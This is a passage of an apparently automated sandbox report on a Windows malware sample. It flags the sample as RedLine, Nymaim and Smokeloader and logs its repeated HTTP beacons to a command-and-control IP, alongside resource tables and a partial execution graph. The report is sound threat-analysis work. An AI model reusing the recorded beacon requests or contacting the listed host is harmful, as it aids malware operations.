                      RT_STRING0x6d4940x520emptyTamilSri Lanka0
                      RT_STRING0x6d9b40x3eeemptyTamilIndia0
                      RT_STRING0x6d9b40x3eeemptyTamilSri Lanka0
                      RT_ACCELERATOR0x6dda40x58emptyTamilIndia0
                      RT_ACCELERATOR0x6dda40x58emptyTamilSri Lanka0
                      RT_GROUP_CURSOR0x6ddfc0x30empty0
                      RT_GROUP_CURSOR0x6de2c0x30empty0
                      RT_GROUP_ICON0x4bd6d40x30dataTamilIndia0.9375
                      RT_GROUP_ICON0x4bd6d40x30dataTamilSri Lanka0.9375
                      RT_VERSION0x4bd7040x254data0.5436241610738255
                      RT_MANIFEST0x4bd9580x152ASCII text, with CRLF line terminators0.6479289940828402

                      Imports

                      DLLImport
                      kernel32.dlllstrcpy

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      TamilIndia
                      TamilSri Lanka

                      Network Behavior

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Nov 30, 2024 10:41:04.697727919 CET4970680192.168.2.8185.156.72.65
                      Nov 30, 2024 10:41:04.818434954 CET8049706185.156.72.65192.168.2.8
                      Nov 30, 2024 10:41:04.818532944 CET4970680192.168.2.8185.156.72.65
                      Nov 30, 2024 10:41:04.933504105 CET4970680192.168.2.8185.156.72.65
                      Nov 30, 2024 10:41:05.054162979 CET8049706185.156.72.65192.168.2.8
                      Nov 30, 2024 10:41:26.791609049 CET8049706185.156.72.65192.168.2.8
                      Nov 30, 2024 10:41:26.791690111 CET4970680192.168.2.8185.156.72.65
                      Nov 30, 2024 10:41:26.792613029 CET4970680192.168.2.8185.156.72.65
                      Nov 30, 2024 10:41:26.912496090 CET8049706185.156.72.65192.168.2.8
                      Nov 30, 2024 10:41:29.807033062 CET4970980192.168.2.8185.156.72.65
                      Nov 30, 2024 10:41:29.926903963 CET8049709185.156.72.65192.168.2.8
                      Nov 30, 2024 10:41:29.927103043 CET4970980192.168.2.8185.156.72.65
                      Nov 30, 2024 10:41:29.927345991 CET4970980192.168.2.8185.156.72.65
                      Nov 30, 2024 10:41:30.047246933 CET8049709185.156.72.65192.168.2.8
                      Nov 30, 2024 10:41:51.901607990 CET8049709185.156.72.65192.168.2.8
                      Nov 30, 2024 10:41:51.903636932 CET4970980192.168.2.8185.156.72.65
                      Nov 30, 2024 10:41:51.903724909 CET4970980192.168.2.8185.156.72.65
                      Nov 30, 2024 10:41:52.023605108 CET8049709185.156.72.65192.168.2.8
                      Nov 30, 2024 10:41:54.920896053 CET4971080192.168.2.8185.156.72.65
                      Nov 30, 2024 10:41:55.041376114 CET8049710185.156.72.65192.168.2.8
                      Nov 30, 2024 10:41:55.041493893 CET4971080192.168.2.8185.156.72.65
                      Nov 30, 2024 10:41:55.041784048 CET4971080192.168.2.8185.156.72.65
                      Nov 30, 2024 10:41:55.161706924 CET8049710185.156.72.65192.168.2.8
                      Nov 30, 2024 10:42:03.046163082 CET4971080192.168.2.8185.156.72.65
                      Nov 30, 2024 10:42:06.116095066 CET4971280192.168.2.8185.156.72.65
                      Nov 30, 2024 10:42:06.236047029 CET8049712185.156.72.65192.168.2.8
                      Nov 30, 2024 10:42:06.236123085 CET4971280192.168.2.8185.156.72.65
                      Nov 30, 2024 10:42:06.236412048 CET4971280192.168.2.8185.156.72.65
                      Nov 30, 2024 10:42:06.356324911 CET8049712185.156.72.65192.168.2.8
                      Nov 30, 2024 10:42:28.204852104 CET8049712185.156.72.65192.168.2.8
                      Nov 30, 2024 10:42:28.208702087 CET4971280192.168.2.8185.156.72.65
                      Nov 30, 2024 10:42:28.208900928 CET4971280192.168.2.8185.156.72.65
                      Nov 30, 2024 10:42:28.328840017 CET8049712185.156.72.65192.168.2.8
                      Nov 30, 2024 10:42:31.221074104 CET4971380192.168.2.8185.156.72.65
                      Nov 30, 2024 10:42:31.341521978 CET8049713185.156.72.65192.168.2.8
                      Nov 30, 2024 10:42:31.341701984 CET4971380192.168.2.8185.156.72.65
                      Nov 30, 2024 10:42:31.342145920 CET4971380192.168.2.8185.156.72.65
                      Nov 30, 2024 10:42:31.462126970 CET8049713185.156.72.65192.168.2.8
                      Nov 30, 2024 10:42:53.252943039 CET8049713185.156.72.65192.168.2.8
                      Nov 30, 2024 10:42:53.254585981 CET4971380192.168.2.8185.156.72.65
                      Nov 30, 2024 10:42:53.254791975 CET4971380192.168.2.8185.156.72.65
                      Nov 30, 2024 10:42:53.374794960 CET8049713185.156.72.65192.168.2.8
                      Nov 30, 2024 10:42:56.268115997 CET4971480192.168.2.8185.156.72.65
                      Nov 30, 2024 10:42:56.388317108 CET8049714185.156.72.65192.168.2.8
                      Nov 30, 2024 10:42:56.388396025 CET4971480192.168.2.8185.156.72.65
                      Nov 30, 2024 10:42:56.388696909 CET4971480192.168.2.8185.156.72.65
                      Nov 30, 2024 10:42:56.508598089 CET8049714185.156.72.65192.168.2.8
                      Nov 30, 2024 10:43:18.316778898 CET8049714185.156.72.65192.168.2.8
                      Nov 30, 2024 10:43:18.316898108 CET4971480192.168.2.8185.156.72.65
                      Nov 30, 2024 10:43:18.317059994 CET4971480192.168.2.8185.156.72.65
                      Nov 30, 2024 10:43:18.437243938 CET8049714185.156.72.65192.168.2.8
                      Nov 30, 2024 10:43:21.332757950 CET4971580192.168.2.8185.156.72.65
                      Nov 30, 2024 10:43:21.453342915 CET8049715185.156.72.65192.168.2.8
                      Nov 30, 2024 10:43:21.457009077 CET4971580192.168.2.8185.156.72.65
                      Nov 30, 2024 10:43:21.457329988 CET4971580192.168.2.8185.156.72.65
                      Nov 30, 2024 10:43:21.577872038 CET8049715185.156.72.65192.168.2.8
                      Nov 30, 2024 10:43:43.466233969 CET8049715185.156.72.65192.168.2.8
                      Nov 30, 2024 10:43:43.466528893 CET4971580192.168.2.8185.156.72.65
                      Nov 30, 2024 10:43:43.466727972 CET4971580192.168.2.8185.156.72.65
                      Nov 30, 2024 10:43:43.586699963 CET8049715185.156.72.65192.168.2.8
                      Nov 30, 2024 10:43:46.479862928 CET4971680192.168.2.8185.156.72.65
                      Nov 30, 2024 10:43:46.600039959 CET8049716185.156.72.65192.168.2.8
                      Nov 30, 2024 10:43:46.600130081 CET4971680192.168.2.8185.156.72.65
                      Nov 30, 2024 10:43:46.600469112 CET4971680192.168.2.8185.156.72.65
                      Nov 30, 2024 10:43:46.720396042 CET8049716185.156.72.65192.168.2.8
                      Nov 30, 2024 10:44:08.519996881 CET8049716185.156.72.65192.168.2.8
                      Nov 30, 2024 10:44:08.520061016 CET4971680192.168.2.8185.156.72.65
                      Nov 30, 2024 10:44:08.520251036 CET4971680192.168.2.8185.156.72.65
                      Nov 30, 2024 10:44:08.640192032 CET8049716185.156.72.65192.168.2.8
                      Nov 30, 2024 10:44:11.532877922 CET4971780192.168.2.8185.156.72.65
                      Nov 30, 2024 10:44:11.653013945 CET8049717185.156.72.65192.168.2.8
                      Nov 30, 2024 10:44:11.653280973 CET4971780192.168.2.8185.156.72.65
                      Nov 30, 2024 10:44:11.653470039 CET4971780192.168.2.8185.156.72.65
                      Nov 30, 2024 10:44:11.773377895 CET8049717185.156.72.65192.168.2.8
                      Nov 30, 2024 10:44:33.599519014 CET8049717185.156.72.65192.168.2.8
                      Nov 30, 2024 10:44:33.601002932 CET4971780192.168.2.8185.156.72.65
                      Nov 30, 2024 10:44:33.601413012 CET4971780192.168.2.8185.156.72.65
                      Nov 30, 2024 10:44:33.721401930 CET8049717185.156.72.65192.168.2.8
                      Nov 30, 2024 10:44:36.612258911 CET4971880192.168.2.8185.156.72.65
                      Nov 30, 2024 10:44:36.732453108 CET8049718185.156.72.65192.168.2.8
                      Nov 30, 2024 10:44:36.732549906 CET4971880192.168.2.8185.156.72.65
                      Nov 30, 2024 10:44:36.732920885 CET4971880192.168.2.8185.156.72.65
                      Nov 30, 2024 10:44:36.852942944 CET8049718185.156.72.65192.168.2.8
                      Nov 30, 2024 10:44:54.671025038 CET4971880192.168.2.8185.156.72.65
                      Nov 30, 2024 10:44:57.688821077 CET4971980192.168.2.8185.156.72.65
                      Nov 30, 2024 10:44:57.808979034 CET8049719185.156.72.65192.168.2.8
                      Nov 30, 2024 10:44:57.809392929 CET4971980192.168.2.8185.156.72.65
                      Nov 30, 2024 10:44:57.809648037 CET4971980192.168.2.8185.156.72.65
                      Nov 30, 2024 10:44:57.929661036 CET8049719185.156.72.65192.168.2.8

                      HTTP Request Dependency Graph

                      • 185.156.72.65

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.849706185.156.72.65807788C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 30, 2024 10:41:04.933504105 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.849709185.156.72.65807788C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 30, 2024 10:41:29.927345991 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.849710185.156.72.65807788C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 30, 2024 10:41:55.041784048 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.849712185.156.72.65807788C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 30, 2024 10:42:06.236412048 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.849713185.156.72.65807788C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 30, 2024 10:42:31.342145920 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.849714185.156.72.65807788C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 30, 2024 10:42:56.388696909 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      6192.168.2.849715185.156.72.65807788C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 30, 2024 10:43:21.457329988 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      7192.168.2.849716185.156.72.65807788C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 30, 2024 10:43:46.600469112 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      8192.168.2.849717185.156.72.65807788C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 30, 2024 10:44:11.653470039 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      9192.168.2.849718185.156.72.65807788C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 30, 2024 10:44:36.732920885 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      10192.168.2.849719185.156.72.65807788C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 30, 2024 10:44:57.809648037 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      System Behavior

                      General

                      Target ID:0
                      Start time:04:40:59
                      Start date:30/11/2024
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\file.exe"
                      Imagebase:0x400000
                      File size:2'027'520 bytes
                      MD5 hash:AC44247E8835B336845AD56B84583656
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3842703347.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000003.1418979529.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:false

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:1.6%
                        Dynamic/Decrypted Code Coverage:5.3%
                        Signature Coverage:3.5%
                        Total number of Nodes:564
                        Total number of Limit Nodes:5
                        execution_graph 30921 40a0b1 30922 40a0bd ___scrt_is_nonwritable_in_current_image 30921->30922 30949 409e11 30922->30949 30924 40a0c4 30925 40a217 30924->30925 30936 40a0ee ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 30924->30936 30976 40a58a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __CreateFrameInfo 30925->30976 30927 40a21e 30977 4106ab 21 API calls __CreateFrameInfo 30927->30977 30929 40a224 30978 41066f 21 API calls __CreateFrameInfo 30929->30978 30931 40a22c 30932 40a10d 30933 40a18e 30957 40a6a5 30933->30957 30936->30932 30936->30933 30975 410685 39 API calls 4 library calls 30936->30975 30950 409e1a 30949->30950 30979 40a2ec IsProcessorFeaturePresent 30950->30979 30952 409e26 30980 40b77d 10 API calls 2 library calls 30952->30980 30954 409e2b 30955 409e2f 30954->30955 30981 40b79c 7 API calls 2 library calls 30954->30981 30955->30924 30982 40b570 30957->30982 30959 40a6b8 GetStartupInfoW 30960 40a194 30959->30960 30961 412288 30960->30961 30984 41816d 30961->30984 30963 40a19c 30966 4087e0 30963->30966 30965 412291 30965->30963 30990 41841d 39 API calls 30965->30990 30993 402460 30966->30993 30969 402460 43 API calls 30970 408807 30969->30970 30997 405a50 30970->30997 30975->30933 30976->30927 30977->30929 30978->30931 30979->30952 30980->30954 30981->30955 30983 40b587 30982->30983 30983->30959 30983->30983 30985 4181a8 30984->30985 30986 418176 30984->30986 30985->30965 30991 41299d 39 API calls 3 library calls 30986->30991 30988 418199 30992 417f78 49 API calls 3 library calls 30988->30992 30990->30965 30991->30988 30992->30985 30994 402483 30993->30994 30994->30994 31312 402760 30994->31312 30996 402495 30996->30969 31339 410822 GetSystemTimeAsFileTime 30997->31339 30999 405a9f 31341 4106e2 30999->31341 31002 402760 43 API calls 31003 405ada 31002->31003 31004 402760 43 API calls 31003->31004 31005 405ca0 31004->31005 31344 403ab0 31005->31344 31007 405e9f 31356 406c40 31007->31356 31009 40620c 31010 402460 43 API calls 31009->31010 31011 40621c 31010->31011 31366 402390 31011->31366 31013 406230 31374 406ee0 31013->31374 31015 40630a 31016 402460 43 API calls 31015->31016 31017 40631a 31016->31017 31018 402390 39 API calls 31017->31018 31019 40632e 31018->31019 31020 406404 31019->31020 31021 406336 31019->31021 31437 407290 53 API calls 2 library calls 31020->31437 31429 406f60 53 API calls 2 library calls 31021->31429 31024 40633b 31026 402460 43 API calls 31024->31026 31025 406409 31027 402460 43 API calls 31025->31027 31028 40634b 31026->31028 31029 406419 31027->31029 31430 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31028->31430 31033 402390 39 API calls 31029->31033 31031 406354 31032 402390 39 API calls 31031->31032 31034 40635c 31032->31034 31035 40642d 31033->31035 31431 406ff0 53 API calls 2 library calls 31034->31431 31188 4064ee 31035->31188 31438 407310 53 API calls 2 library calls 31035->31438 31037 406361 31042 402460 43 API calls 31037->31042 31040 4064f8 31044 402460 43 API calls 31040->31044 31041 40643a 31043 402460 43 API calls 31041->31043 31045 406371 31042->31045 31046 40644a 31043->31046 31047 406508 31044->31047 31432 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31045->31432 31439 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31046->31439 31055 402390 39 API calls 31047->31055 31049 40637a 31051 402390 39 API calls 31049->31051 31053 406382 31051->31053 31052 406453 31054 402390 39 API calls 31052->31054 31433 407070 53 API calls 2 library calls 31053->31433 31057 40645b 31054->31057 31058 40651c 31055->31058 31440 407390 53 API calls 2 library calls 31057->31440 31270 406603 31058->31270 31447 4076b0 53 API calls 2 library calls 31058->31447 31059 406387 31066 402460 43 API calls 31059->31066 31062 406460 31068 402460 43 API calls 31062->31068 31064 40660d 31069 402460 43 API calls 31064->31069 31065 406529 31071 402460 43 API calls 31065->31071 31067 406397 31066->31067 31076 402390 39 API calls 31067->31076 31070 406470 31068->31070 31072 40661d 31069->31072 31441 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31070->31441 31074 406539 31071->31074 31085 402390 39 API calls 31072->31085 31448 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31074->31448 31080 4063ab 31076->31080 31077 406479 31078 402390 39 API calls 31077->31078 31081 406481 31078->31081 31079 406542 31082 402390 39 API calls 31079->31082 31083 4063cc 31080->31083 31084 4063af 31080->31084 31442 407410 53 API calls 2 library calls 31081->31442 31087 40654a 31082->31087 31435 407180 53 API calls 2 library calls 31083->31435 31434 407100 53 API calls 2 library calls 31084->31434 31090 406631 31085->31090 31449 407730 53 API calls 2 library calls 31087->31449 31091 4066b3 31090->31091 31092 406635 31090->31092 31464 407c70 53 API calls 2 library calls 31091->31464 31458 407ae0 53 API calls 2 library calls 31092->31458 31093 406486 31103 402460 43 API calls 31093->31103 31095 4063d1 31104 402460 43 API calls 31095->31104 31096 4063b4 31102 402460 43 API calls 31096->31102 31099 40654f 31106 402460 43 API calls 31099->31106 31100 4066b8 31108 402460 43 API calls 31100->31108 31101 40663a 31109 402460 43 API calls 31101->31109 31283 4063c4 31102->31283 31105 406496 31103->31105 31107 4063e1 31104->31107 31117 402390 39 API calls 31105->31117 31110 40655f 31106->31110 31119 402390 39 API calls 31107->31119 31112 4066c8 31108->31112 31113 40664a 31109->31113 31450 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31110->31450 31125 402390 39 API calls 31112->31125 31459 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31113->31459 31115 406875 31120 402390 39 API calls 31115->31120 31122 4064aa 31117->31122 31118 406568 31123 402390 39 API calls 31118->31123 31124 4063f5 31119->31124 31221 4066a7 31120->31221 31121 406653 31126 402390 39 API calls 31121->31126 31127 4064b8 31122->31127 31128 4064ae 31122->31128 31129 406570 31123->31129 31124->31221 31436 407210 53 API calls 2 library calls 31124->31436 31132 4066dc 31125->31132 31133 40665b 31126->31133 31444 407520 53 API calls 2 library calls 31127->31444 31443 4074a0 53 API calls 2 library calls 31128->31443 31451 4077b0 53 API calls 2 library calls 31129->31451 31137 4066e0 31132->31137 31138 40675e 31132->31138 31460 407b60 53 API calls 2 library calls 31133->31460 31465 407d00 53 API calls 2 library calls 31137->31465 31471 407e80 53 API calls 2 library calls 31138->31471 31140 406575 31149 402460 43 API calls 31140->31149 31141 4068a1 31388 4083f0 31141->31388 31144 4064bd 31150 402460 43 API calls 31144->31150 31146 406763 31157 402460 43 API calls 31146->31157 31147 4066e5 31158 402460 43 API calls 31147->31158 31148 406660 31154 402460 43 API calls 31148->31154 31152 406585 31149->31152 31153 4064cd 31150->31153 31151 4068aa 31162 402460 43 API calls 31151->31162 31452 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31152->31452 31167 402390 39 API calls 31153->31167 31155 406670 31154->31155 31461 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31155->31461 31163 406773 31157->31163 31159 4066f5 31158->31159 31466 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31159->31466 31161 40658e 31166 402390 39 API calls 31161->31166 31168 4068bd 31162->31168 31175 402390 39 API calls 31163->31175 31165 406679 31170 402390 39 API calls 31165->31170 31171 406596 31166->31171 31172 4064e1 31167->31172 31398 408370 31168->31398 31169 4066fe 31176 402390 39 API calls 31169->31176 31177 406681 31170->31177 31453 407830 53 API calls 2 library calls 31171->31453 31172->31221 31445 4075b0 53 API calls 2 library calls 31172->31445 31174 4068c8 31189 402460 43 API calls 31174->31189 31179 406787 31175->31179 31180 406706 31176->31180 31462 407bf0 53 API calls 2 library calls 31177->31462 31184 40678b 31179->31184 31185 4067de 31179->31185 31467 407d80 53 API calls 2 library calls 31180->31467 31182 40659b 31195 402460 43 API calls 31182->31195 31472 407f10 53 API calls 2 library calls 31184->31472 31477 4080d0 53 API calls 2 library calls 31185->31477 31187 406686 31198 402460 43 API calls 31187->31198 31446 407630 53 API calls 2 library calls 31188->31446 31193 4068db 31189->31193 31191 40670b 31201 402460 43 API calls 31191->31201 31408 4082d0 31193->31408 31194 406790 31204 402460 43 API calls 31194->31204 31199 4065ab 31195->31199 31196 4067e3 31203 402460 43 API calls 31196->31203 31202 406696 31198->31202 31207 402390 39 API calls 31199->31207 31200 4068e6 31213 402460 43 API calls 31200->31213 31205 40671b 31201->31205 31463 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31202->31463 31208 4067f3 31203->31208 31209 4067a0 31204->31209 31468 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31205->31468 31212 4065bf 31207->31212 31223 402390 39 API calls 31208->31223 31473 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31209->31473 31211 40669f 31216 402390 39 API calls 31211->31216 31217 4065c8 31212->31217 31454 4078c0 53 API calls 2 library calls 31212->31454 31218 4068f9 31213->31218 31215 406724 31220 402390 39 API calls 31215->31220 31216->31221 31455 407940 53 API calls 2 library calls 31217->31455 31418 408da0 31218->31418 31219 4067a9 31226 402390 39 API calls 31219->31226 31227 40672c 31220->31227 31384 4017a0 31221->31384 31228 406807 31223->31228 31231 4067b1 31226->31231 31469 407e00 53 API calls 2 library calls 31227->31469 31228->31221 31478 408150 53 API calls 2 library calls 31228->31478 31229 4065d2 31240 402460 43 API calls 31229->31240 31474 407fd0 53 API calls 2 library calls 31231->31474 31233 406731 31243 402460 43 API calls 31233->31243 31236 4067b6 31246 402460 43 API calls 31236->31246 31238 406926 31426 408eb0 31238->31426 31239 406810 31251 402460 43 API calls 31239->31251 31244 4065e2 31240->31244 31247 406741 31243->31247 31256 402390 39 API calls 31244->31256 31245 408e00 43 API calls 31248 406953 31245->31248 31249 4067c6 31246->31249 31470 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31247->31470 31252 408eb0 43 API calls 31248->31252 31475 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31249->31475 31255 406820 31251->31255 31258 406968 31252->31258 31254 40674a 31260 402390 39 API calls 31254->31260 31479 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31255->31479 31257 4065f6 31256->31257 31257->31221 31456 4079d0 53 API calls 2 library calls 31257->31456 31262 408e00 43 API calls 31258->31262 31259 4067cf 31263 402390 39 API calls 31259->31263 31260->31221 31266 406980 31262->31266 31267 4067d7 31263->31267 31264 406829 31268 402390 39 API calls 31264->31268 31271 402390 39 API calls 31266->31271 31476 408050 53 API calls 2 library calls 31267->31476 31269 406831 31268->31269 31480 4081d0 53 API calls 2 library calls 31269->31480 31457 407a50 53 API calls 2 library calls 31270->31457 31274 40698e 31271->31274 31276 402390 39 API calls 31274->31276 31275 406836 31280 402460 43 API calls 31275->31280 31277 406999 31276->31277 31278 402390 39 API calls 31277->31278 31281 4069a4 31278->31281 31279 4067dc 31282 402460 43 API calls 31279->31282 31284 406846 31280->31284 31285 402390 39 API calls 31281->31285 31282->31283 31483 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31283->31483 31481 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31284->31481 31287 4069af 31285->31287 31289 402390 39 API calls 31287->31289 31288 40684f 31291 402390 39 API 